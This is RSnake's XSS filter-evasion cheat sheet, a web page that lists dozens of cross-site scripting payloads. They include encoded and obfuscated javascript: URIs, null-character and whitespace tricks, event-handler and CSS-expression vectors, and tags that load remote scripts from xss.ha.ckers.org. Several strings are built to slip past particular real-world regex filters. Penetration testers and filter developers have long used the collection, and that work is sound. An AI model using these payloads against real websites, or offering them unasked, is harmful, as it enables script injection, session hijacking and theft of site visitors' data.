XSS cheatsheet Esp: for filter evasion By RSnake Note from the author: If you don't know how XSS (Cross Site Scripting) works, this page probably won't help you. This page is for people who already understand the basics of XSS but want a deep understanding of the nuances regarding filter evasion. This page will also not show you how to mitigate these risks or how to write the actual cookie/credential stealing portion of the attack. It will simply show the underlying attack vectors and you can infer the rest. I may add mitigation techniques or other forms of XSS like button/form overwriting later, since I haven't found many good resources on this topic thus far. XSS (Cross Site Scripting): XSS locator (inject this string, view source and search for "XSS", if you see "<XSS" verses "&lt;XSS" it may be vulnerable): '';!--"<XSS>=&{()} Normal XSS: <IMG SRC="javascript:alert('XSS');"> No quotes and no semicolon: <IMG SRC=javascript:alert('XSS')> Case insensitive XSS attack vector: <IMG SRC=JaVaScRiPt:alert('XSS')> HTML entities: <IMG SRC=JaVaScRiPt:alert(&quot;XSS&quot;)> UTF-8 Unicode encoding (almost all of these encoding methods work only in Internet Explorer and Opera): <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41> Long UTF-8 Unicode encoding without semicolons (this is often effective in XSS that attempts to look for &#XX, since most people don't know about padding - up to 7 numeric charachters total). This is also useful against people who decoding against strings like $tmp_string =~ s/.*\&#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate a html encoded string (I've seen this in the wild): <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> Hex encoding without semicolons (this is also a viable attack against the above string $tmp_string =~ s/.*\&#(\d+);.*/$1/; which assumes that there is a numeric charachter following the pound symbol - which is not true with hex HTML charachters): <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> Embedded tab to break up XSS. This works in IE and Opera. Some websites claim than any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ascii chart for more details. The following four XSS examples illustrate this vector: <IMG SRC="jav&#x09;ascript:alert('XSS');"> Embedded newline to break up XSS: <IMG SRC="jav&#x0A;ascript:alert('XSS');"> Embedded carriage return to break up XSS: <IMG SRC="jav&#x0D;ascript:alert('XSS');"> Multiline Injected JS using ASCII carriage returns (same as above only a more extreme example of this XSS vector) these are not spaces just one of the three charachters as described above: <IMG SRC = j a v a s c r i p t : a l e r t ( ' X S S ' ) " > Okay, I lied, null chars also work as XSS vectors in both IE and older versions of Opera, but not like above, you need to inject them directly using something like Burp Proxy or if you want to write your own you can either use vim (^V@ will produce a null) or the following program to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hypen control char). But the null char %00 is much more useful and helped me bypass Christian's code with a variation on this example: perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out Along the same lines as the above XSS vector, you can inject null chars anywhere in the HTML and it will render in IE and older versions of Opera (the ^@ represents a null char as seen through a VT100 PuTTy client): <^@i^@m^@g^@ ^@s^@r^@c^@=^@"^@javascript:alert('XSS')"> Spaces before the JavaScript in images for XSS (this is useful if the pattern match doesn't take into account spaces in the word "javascript:" -which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the "javascript:" keyword): <IMG SRC=" javascript:alert('XSS');"> XSS with no single quotes or double quotes or semicolons: <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> BODY image: <BODY BACKGROUND="javascript:alert('XSS')"> BODY tag (I like this method because it doesn't require using any variants of "javascript:" or "<SCRIPT..." to accomplish the XSS attack): <BODY ONLOAD=alert('XSS')> Event Handlers that can be used in similar XSS attacks to the one above (this is the most comprehensive list on the net, at the time of this writing): 1. FSCommand() (attacker can use this when executed from within an embedded Flash object) 2. onAbort() (when user aborts the loading of an image) 3. onActivate() (when object is set as the active element) 4. onAfterPrint() (activates after user prints or previews print job) 5. onAfterUpdate() (activates on data object after updating data in the source object) 6. onBeforeActivate() (fires before the object is set as the active element) 7. onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand("Copy") function) 8. onBeforeCut() (attacker executes the attack string right before a selection is cut) 9. onBeforeDeactivate() (fires right after the activeElement is changed from the current object) 10. onBeforeEditFocus() (Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected) 11. onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand("Paste") function) 12. onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand("Print") function). 13. onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent) 14. onBlur() (in the case where another popup is loaded and window looses focus) 15. onBounce() (fires when the behavior property of the marquee object is set to "alternate" and the contents of the marquee reach one side of the window) 16. onCellChange() (fires when data changes in the data provider) 17. onChange() (select, text, or TEXTAREA field loses focus and its value has been modified) 18. onClick() (someone clicks on a form) 19. onContextMenu() (user would need to right click on attack area) 20. onControlSelect() (fires when the user is about to make a control selection of the object) 21. onCopy() (user needs to copy something or it can be exploited using the execCommand("Copy") command) 22. onCut() (user needs to copy something or it can be exploited using the execCommand("Cut") command) 23. onDataAvailible() (user would need to change data in an element, or attacker could perform the same function) 24. onDataSetChanged() (fires when the data set exposed by a data source object changes) 25. onDataSetComplete() (fires to indicate that all data is available from the data source object) 26. onDblClick() (user double-clicks a form element or a link) 27. onDeactivate() (fires when the activeElement is changed from the current object to another object in the parent document) 28. onDrag() (requires that the user drags an object) 29. onDragEnd() (requires that the user drags an object) 30. onDragLeave() (requires that the user drags an object off a valid location) 31. onDragEnter() (requires that the user drags an object into a valid location) 32. onDragOver() (requires that the user drags an object into a valid location) 33. onDragDrop() (user drops an object (e.g. file) onto the browser window) 34. onDrop() (user drops an object (e.g. file) onto the browser window) 35. onError() (loading of a document or image causes an error) 36. onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object) 37. onExit() (someone clicks on a link or presses the back button) 38. onFilterChange() (fires when a visual filter completes state change) 39. onFinish() (attacker can create the exploit when marquee is finished looping) 40. onFocus() (attacker executes the attack string when the window gets focus) 41. onFocusIn() (attacker executes the attack string when window gets focus) 42. onFocusOut() (attacker executes the attack string when window looses focus) 43. onHelp() (attacker executes the attack string when users hits F1 while the window is in focus) 44. onKeyDown() (user depresses a key) 45. onKeyPress() (user presses or holds down a key) 46. onKeyUp() (user releases a key) 47. onLayoutComplete() (user would have to print or print preview) 48. onLoad() (attacker executes the attack string after the window loads) 49. onLoseCapture() (can be exploited by the releaseCapture() method) 50. onMouseDown() (the attacker would need to get the user to click on an image) 51. onMouseEnter() (cursor moves over an object or area) 52. onMouseLeave() (the attacker would need to get the user to mouse over an image or table and then off again) 53. onMouseMove() (the attacker would need to get the user to mouse over an image or table) 54. onMouseOut() (the attacker would need to get the user to mouse over an image or table and then off again) 55. onMouseOver() (cursor moves over an object or area) 56. onMouseUp() (the attacker would need to get the user to click on an image) 57. onMouseWheel() (the attacker would need to get the user to use their mouse wheel) 58. onMove() (user or attacker would move the page) 59. onMoveEnd() (user or attacker would move the page) 60. onMoveStart() (user or attacker would move the page) 61. onPaste() (user would need to paste or attacker could use the execCommand("Paste") function) 62. onProgress() (attacker would use this as a flash movie was loading) 63. onPropertyChange() (user or attacker would need to change an element property) 64. onReadyStateChange() (user or attacker would need to change an element property) 65. onReset() (user or attacker resets a form) 66. onResize() (user would resize the window; attacker could auto initialize with something like: <script>self.resizeTo(500,400);</script>) 67. onResizeEnd() (user would resize the window; attacker could auto initialize with something like: <script>self.resizeTo(500,400);</script>) 68. onResizeStart() (user would resize the window; attacker could auto initialize with something like: <script>self.resizeTo(500,400);</script>) 69. onRowEnter() (user or attacker would need to change a row in a data source) 70. onRowExit() (user or attacker would need to change a row in a data source) 71. onRowDelete() (user or attacker would need to delete a row in a data source) 72. onRowInserted() (user or attacker would need to insert a row in a data source) 73. onScroll() (user would need to scroll, or attacker could use the scrollBy() function) 74. onSelect() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");) 75. onSelectionChange() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");) 76. onSelectStart() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");) 77. onStart() (fires at the beginning of each marquee loop) 78. onStop() (user would need to press the stop button or leave the webpage) 79. onSubmit() (requires attacker or user submits a form) 80. onUnload() (as the user clicks any link or presses the back button or attacker forces a click) IMG Dynsrc (works in IE): <IMG DYNSRC="javascript:alert('XSS')"> Input Dynsrc and Src (This XSS works in IE but remember to use TYPE="image"): <INPUT TYPE="image" DYNSRC="javascript:alert('XSS');"> BGSOUND (works in IE): <BGSOUND SRC="javascript:alert('XSS');"> & JS includes (works in Netscape 4.x): <br size="&{alert('XSS')}"> Layer (also only works in Netscape 4.x) <LAYER SRC="http://xss.ha.ckers.org/a.js"></layer> Style sheet: <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> VBscript in an image: <IMG SRC='vbscript:msgbox("XSS")'> Mocha (older versions of Netscape only): <IMG SRC="mocha:[code]"> Livescript (older versions of Netscape only): <IMG SRC="livescript:[code]"> Meta (the odd thing about meta refresh is that it doesn't send a referrer in the header on IE, Firefox, Netscape or Opera - so it can be used for certain types of attacks where you need to get rid of referring URLs): <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> Iframe (if iframes are allowed there are a lot of other XSS problems as well): <IFRAME SRC=javascript:alert('XSS')></IFRAME> Frame (frames have the same sorts of XSS problems as iframes): <FRAMESET><FRAME SRC=javascript:alert('XSS')></FRAME></FRAMESET> Tables (who would have thought tables were XSS targets... except me, of course): <TABLE BACKGROUND="javascript:alert('XSS')"> Div background-image: <DIV STYLE="background-image: url(javascript:alert('XSS'))"> Div behavior for *.htc XSS exploits (Netscape only): <DIV STYLE="behaviour: url('http://xss.ha.ckers.org/exploit.htc');"> Div expression (IE only) - a variant of this was effective against Christian's XSS filter using a newline between the colon and "expression": <DIV STYLE="width: expression(alert('XSS'));"> STYLE tags with broken up JavaScript for XSS: <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> IMG STYLE with expression (this is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart): <IMG STYLE=' xss: expre\ssion(alert("XSS"))'> STYLE tag (Netscape only): <STYLE TYPE="text/javascript">alert('XSS');</STYLE> STYLE tag using background-image: <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> STYLE tag using background: <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> BASE tag. You need the // to comment out the next charachters so you won't get a JS error and your XSS tag will render. Also, this relies that the website uses dynamically placed images like "/images/image.jpg" rather than full paths: <BASE HREF="javascript:alert('XSS');//"> OBJECT tag (IE only, but if they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag): <OBJECT data=http://xss.ha.ckers.org width=400 height=400 type=text/x-scriptlet"> Using an OBJECT tag you can imbed a flash movie that contains XSS: getURL("javascript:alert('XSS')") Using the above action script inside flash can obfuscate your XSS vector: a="get"; b="URL"; c="javascript:"; d="alert('XSS');"; eval(a+b+c+d); XML: <XML SRC="javascript:alert('XSS');"> Assuming you can only write into the <IMG SRC="$yourinput"> field and the string "javascript:" is recursively removed: "> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><" Assuming you can only fit in a few charachters and it filters against ".js" you can rename your JavaScript file to an image as an XSS vector: <SCRIPT SRC="http://xss.ha.ckers.org/xss.jpg"><SCRIPT> Half open HTML/JS XSS vector. This is useful as a vector because it doesn't require a close angle bracket. This assumes there is ANY HTML tags below where you are injecting your XSS. Even though there is no close ">" tag the tags below it will close it. Two notes 1) this does mess up the HTML, depending on what HTML is beneath it and 2) you definitely need the quotes or it will cause your JavaScript to fail as the next line it will try to render will be something like "</TABLE>". As a side note, this was also affective against Christian's XSS filter using an IFRAME tag instead of an IMG tag: <IMG SRC="javascript:alert('XSS')" XSS using HTML quote ecapsulation: This was tested in IE, your mileage may vary. For performing XSS on sites that allow "<script>" but don't allow "<SCRIPT SRC..." by way of a regex filter"/<script[^>]+src/i": <SCRIPT a=">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT> For performing XSS on sites that allow "<script>" but don't allow "<script src..." by way of a regex filter "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i" (this is an important one, because I've seen this regex in the wild): <SCRIPT =">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT> Another XSS to evade the same filter, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i": <SCRIPT a= ">" '' SRC="http://xss.ha.ckers.org/a.js"></SCRIPT> Yet another XSS to evade the same filter, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i": <SCRIPT "a= '>'" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT> This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content: <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js"></SCRIPT> URL string evasion (assuming "http://www.google.com/" is programmatically disallowed): IP verses hostname: <A HREF=http://66.102.7.147/>link</A> URL encoding: <A HREF=http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D>link</A> Protocol resolution bypass (ht:// translates in IE to http:// and there are many others that work with XSS as well, such as htt://, hta://, help://, etc...). This is really handy when space is an issue too (two less charachters can go a long way): <A HREF=ht://www.google.com/>link</A> Removing cnames (when combined with the above URL, removing "www." will save an additional 4 bytes for a total byte savings of 6 for servers that have this set up properly): <A HREF=http://google.com/>link</A> Extra dot for absolute DNS: <A HREF=http://www.google.com./>link</A> JavaScript link location: <A HREF="javascript:document.location='http://www.google.com/'">link</A> Content replace as attack vector (assuming "http://www.google.com/" is programmatically replaced with nothing): <A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A> Charachter Encoding: All the possible combinations of the charachter"<" in HTML and JavaScript (standards are great, aren't they?): < %3C &lt &lt; &LT &LT; &#60 &#060 &#0060 &#00060 &#000060 &#0000060 &#60; &#060; &#0060; &#00060; &#000060; &#0000060; &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c &#x3c; &#x03c; &#x003c; &#x0003c; &#x00003c; &#x000003c; &#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c &#X3c; &#X03c; &#X003c; &#X0003c; &#X00003c; &#X000003c; &#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C &#x3C; &#x03C; &#x003C; &#x0003C; &#x00003C; &#x000003C; &#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C &#X3C; &#X03C; &#X003C; &#X0003C; &#X00003C; &#X000003C; \x3c \x3C \u003c \u003C Character Encoding Calculator ASCII Text: Hex Value: URL: HTML (with semicolons): Decimal Value: HTML (without semicolons):